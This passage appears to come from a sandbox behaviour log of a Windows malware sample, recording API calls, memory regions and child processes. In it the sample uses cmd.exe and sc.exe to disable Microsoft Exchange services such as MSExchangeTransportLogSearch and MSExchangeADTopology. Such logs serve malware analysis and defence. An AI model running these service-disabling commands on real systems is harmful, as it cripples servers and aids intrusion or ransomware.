dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x493f554 | out: lpAttributeList=0x493f570, lpSize=0x493f554) returned 1 [0134.481] UpdateProcThreadAttribute (in: lpAttributeList=0x493f570, dwFlags=0x0, Attribute=0x60001, lpValue=0x493f55c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x493f570, lpPreviousValue=0x0) returned 1 [0134.481] GetStartupInfoW (in: lpStartupInfo=0x493f5a8 | out: lpStartupInfo=0x493f5a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0134.481] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0134.482] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.482] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeTransportLogSearch start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x493f4f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeTransportLogSearch start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x493f544 | out: lpCommandLine="sc config MSExchangeTransportLogSearch start= disabled", lpProcessInformation=0x493f544*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xda4, dwThreadId=0xdd0)) returned 1 [0134.488] CloseHandle (hObject=0xa4) returned 1 [0134.488] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.488] GetEnvironmentStringsW () returned 0x4c59f28* [0134.488] FreeEnvironmentStringsA (penv="=") returned 1 [0134.488] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0134.534] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x493f4dc | out: lpExitCode=0x493f4dc*=0x424) returned 1 [0134.534] CloseHandle (hObject=0xa8) returned 1 [0134.534] _vsnwprintf (in: _Buffer=0x493f5c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x493f4e4 | out: _Buffer="00000424") returned 8 [0134.534] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0134.534] GetEnvironmentStringsW () returned 0x4c5b378* [0134.534] FreeEnvironmentStringsA (penv="=") returned 1 [0134.534] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.534] GetEnvironmentStringsW () returned 0x4c5b378* [0134.534] FreeEnvironmentStringsA (penv="=") returned 1 [0134.534] DeleteProcThreadAttributeList (in: lpAttributeList=0x493f570 | out: lpAttributeList=0x493f570) [0134.534] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.534] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.534] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.534] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.534] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.535] SetConsoleInputExeNameW () returned 0x1 [0134.535] GetConsoleOutputCP () returned 0x1b5 [0134.535] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.535] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.535] exit (_Code=1060) Thread: id = 576 os_tid = 0xdc0 Process: id = "180" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x390e1000" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "179" os_parent_pid = "0xdcc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9263 start_va = 0x7f66e000 end_va = 0x7f66efff entry_point = 0x0 region_type = private name = "private_0x000000007f66e000" filename = "" Region: id = 9264 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9265 start_va = 0x3092500000 end_va = 0x309251ffff entry_point = 0x0 region_type = private name = "private_0x0000003092500000" filename = "" Region: id = 9266 start_va = 0x3092520000 end_va = 0x3092533fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003092520000" filename = "" Region: id = 9267 start_va = 0x3092540000 end_va = 0x309257ffff entry_point = 0x0 region_type = private name = "private_0x0000003092540000" filename = "" Region: id = 9268 start_va = 0x7df5ff150000 end_va = 0x7ff5ff14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff150000" filename = "" Region: id = 9269 start_va = 0x7ff6c3ab0000 end_va = 0x7ff6c3ad2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ab0000" filename = "" Region: id = 9270 start_va = 0x7ff6c3ada000 end_va = 0x7ff6c3adafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ada000" filename = "" Region: id = 9271 start_va = 0x7ff6c3ade000 end_va = 0x7ff6c3adffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ade000" filename = "" Region: id = 9272 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9273 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9274 start_va = 0x3092500000 end_va = 0x309250ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003092500000" filename = "" Region: id = 9275 start_va = 0x3092510000 end_va = 0x309251ffff entry_point = 0x0 region_type = private name = "private_0x0000003092510000" filename = "" Region: id = 9276 start_va = 0x3092580000 end_va = 0x30925bffff entry_point = 0x0 region_type = private name = "private_0x0000003092580000" filename = "" Region: id = 9277 start_va = 0x30925c0000 end_va = 0x30925c6fff entry_point = 0x0 region_type = private name = "private_0x00000030925c0000" filename = "" Region: id = 9278 start_va = 0x30925d0000 end_va = 0x30925d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000030925d0000" filename = "" Region: id = 9279 start_va = 0x30925e0000 end_va = 0x30925e6fff entry_point = 0x0 region_type = private name = "private_0x00000030925e0000" filename = "" Region: id = 9280 start_va = 0x30925f0000 end_va = 0x30925f0fff entry_point = 0x0 region_type = private name = "private_0x00000030925f0000" filename = "" Region: id = 9281 start_va = 0x3092600000 end_va = 0x3092600fff entry_point = 0x0 region_type = private name = "private_0x0000003092600000" filename = "" Region: id = 9282 start_va = 0x3092610000 end_va = 0x309270ffff entry_point = 0x0 region_type = private name = "private_0x0000003092610000" filename = "" Region: id = 9283 start_va = 0x3092710000 end_va = 0x30927cdfff entry_point = 0x3092710000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9284 start_va = 0x30927d0000 end_va = 0x3092957fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000030927d0000" filename = "" Region: id = 9285 start_va = 0x3092960000 end_va = 0x3092ae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003092960000" filename = "" Region: id = 9286 start_va = 0x3092af0000 end_va = 0x3093eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003092af0000" filename = "" Region: id = 9287 start_va = 0x7ff6c39b0000 end_va = 0x7ff6c3aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c39b0000" filename = "" Region: id = 9288 start_va = 0x7ff6c3adc000 end_va = 0x7ff6c3addfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3adc000" filename = "" Region: id = 9289 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9290 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9291 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9292 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9293 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9294 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9295 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9296 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9297 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9298 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9299 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9300 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9301 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9302 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 573 os_tid = 0xd6c Thread: id = 574 os_tid = 0xdbc Thread: id = 575 os_tid = 0xda0 Process: id = "181" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x292db000" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "179" os_parent_pid = "0xdcc" cmd_line = "sc config MSExchangeTransportLogSearch start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9316 start_va = 0x790000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 9317 start_va = 0x7b0000 end_va = 0x7b1fff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 9318 start_va = 0x7c0000 end_va = 0x7d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 9319 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 9320 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 9321 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 9322 start_va = 0x870000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 9323 start_va = 0x880000 end_va = 0x881fff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 9324 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 9325 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 9326 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9327 start_va = 0x7f440000 end_va = 0x7f462fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f440000" filename = "" Region: id = 9328 start_va = 0x7f46a000 end_va = 0x7f46afff entry_point = 0x0 region_type = private name = "private_0x000000007f46a000" filename = "" Region: id = 9329 start_va = 0x7f46c000 end_va = 0x7f46efff entry_point = 0x0 region_type = private name = "private_0x000000007f46c000" filename = "" Region: id = 9330 start_va = 0x7f46f000 end_va = 0x7f46ffff entry_point = 0x0 region_type = private name = "private_0x000000007f46f000" filename = "" Region: id = 9331 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9332 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9333 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9334 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9335 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9336 start_va = 0x8d0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 9337 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9338 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9339 start_va = 0xa10000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 9340 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9341 start_va = 0x790000 end_va = 0x79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 9342 start_va = 0x7a0000 end_va = 0x7a3fff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 9343 start_va = 0x890000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 9344 start_va = 0x8e0000 end_va = 0x99dfff entry_point = 0x8e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9345 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 9346 start_va = 0xd00000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 9347 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9348 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9349 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9350 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9351 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9352 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9353 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9354 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9355 start_va = 0x7f340000 end_va = 0x7f43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f340000" filename = "" Region: id = 9356 start_va = 0x7f467000 end_va = 0x7f469fff entry_point = 0x0 region_type = private name = "private_0x000000007f467000" filename = "" Region: id = 9357 start_va = 0xb10000 end_va = 0xbeefff entry_point = 0xb10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 9358 start_va = 0x9e0000 end_va = 0x9f1fff entry_point = 0x9e0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 577 os_tid = 0xdd0 [0134.522] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0134.522] __set_app_type (_Type=0x1) [0134.522] __p__fmode () returned 0x77ac4d6c [0134.522] __p__commode () returned 0x77ac5b1c [0134.522] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0134.522] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0134.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.525] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0134.525] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0134.525] _wcsicmp (_String1="config", _String2="query") returned -14 [0134.525] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0134.525] _wcsicmp (_String1="config", _String2="start") returned -16 [0134.525] _wcsicmp (_String1="config", _String2="pause") returned -13 [0134.525] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0134.525] _wcsicmp (_String1="config", _String2="control") returned -14 [0134.525] _wcsicmp (_String1="config", _String2="continue") returned -14 [0134.525] _wcsicmp (_String1="config", _String2="stop") returned -16 [0134.525] _wcsicmp (_String1="config", _String2="config") returned 0 [0134.525] ResolveDelayLoadedAPI () returned 0x77262c10 [0134.525] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xa18580 [0134.527] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0134.527] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0134.527] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0134.527] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0134.527] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0134.527] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0134.527] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0134.527] OpenServiceW (hSCManager=0xa18580, lpServiceName="MSExchangeTransportLogSearch", dwDesiredAccess=0x3) returned 0x0 [0134.527] GetLastError () returned 0x424 [0134.527] _ultow (in: _Dest=0x424, _Radix=8780380 | out: _Dest=0x424) returned="1060" [0134.527] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0134.528] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x85fa38, nSize=0x2, Arguments=0x85fa50 | out: lpBuffer="褐¡喝…蔔è") returned 0x62 [0134.529] GetFileType (hFile=0x3c) returned 0x2 [0134.529] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85fa1c | out: lpMode=0x85fa1c) returned 1 [0134.529] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa18910*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x85fa2c, lpReserved=0x0 | out: lpBuffer=0xa18910*, lpNumberOfCharsWritten=0x85fa2c*=0x62) returned 1 [0134.529] LocalFree (hMem=0xa18910) returned 0x0 [0134.529] LocalFree (hMem=0x0) returned 0x0 [0134.529] CloseServiceHandle (hSCObject=0xa18580) returned 1 [0134.529] LocalFree (hMem=0x0) returned 0x0 [0134.529] exit (_Code=1060) Thread: id = 578 os_tid = 0xdb4 Process: id = "182" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x10da1000" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeADTopology start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" 